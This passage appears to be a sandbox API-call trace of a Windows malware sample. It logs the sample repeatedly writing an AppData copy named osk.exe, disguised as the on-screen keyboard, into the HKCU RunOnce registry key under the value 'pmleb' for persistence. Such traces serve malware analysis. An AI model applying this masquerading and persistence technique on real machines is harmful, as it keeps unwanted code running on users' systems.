wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.609] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.609] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.609] KillTimer (hWnd=0x20280, uIDEvent=0x20bb) returned 1 [0081.609] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.609] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.610] IUnknown:Release (This=0x787518) returned 0x1 [0081.610] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.610] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.610] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.610] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.610] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x40 [0081.610] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.610] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x41 [0081.610] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.611] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x40 [0081.611] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.611] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.611] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.611] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.611] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.611] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.611] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.612] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.612] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.612] RegCloseKey (hKey=0x280) returned 0x0 [0081.612] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.612] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.612] SetTimer (hWnd=0x20280, nIDEvent=0x20bc, uElapse=0xa, lpTimerFunc=0x0) returned 0x20bc [0081.612] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.625] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.625] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.625] KillTimer (hWnd=0x20280, uIDEvent=0x20bc) returned 1 [0081.625] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.625] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.625] IUnknown:Release (This=0x787518) returned 0x1 [0081.625] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.625] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.625] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.626] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.626] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x41 [0081.626] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.626] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x42 [0081.626] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.627] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x41 [0081.627] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.627] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.627] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.627] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.627] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.627] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.627] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.627] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.628] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.628] RegCloseKey (hKey=0x280) returned 0x0 [0081.628] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.628] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.628] SetTimer (hWnd=0x20280, nIDEvent=0x20bd, uElapse=0xa, lpTimerFunc=0x0) returned 0x20bd [0081.628] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.640] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.640] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.640] KillTimer (hWnd=0x20280, uIDEvent=0x20bd) returned 1 [0081.641] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.641] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.641] IUnknown:Release (This=0x787518) returned 0x1 [0081.641] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.641] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.641] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.641] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.641] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x42 [0081.641] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.641] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x43 [0081.641] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.642] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x42 [0081.642] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.642] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.642] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.642] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.642] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.642] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.643] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.643] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.643] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.643] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: 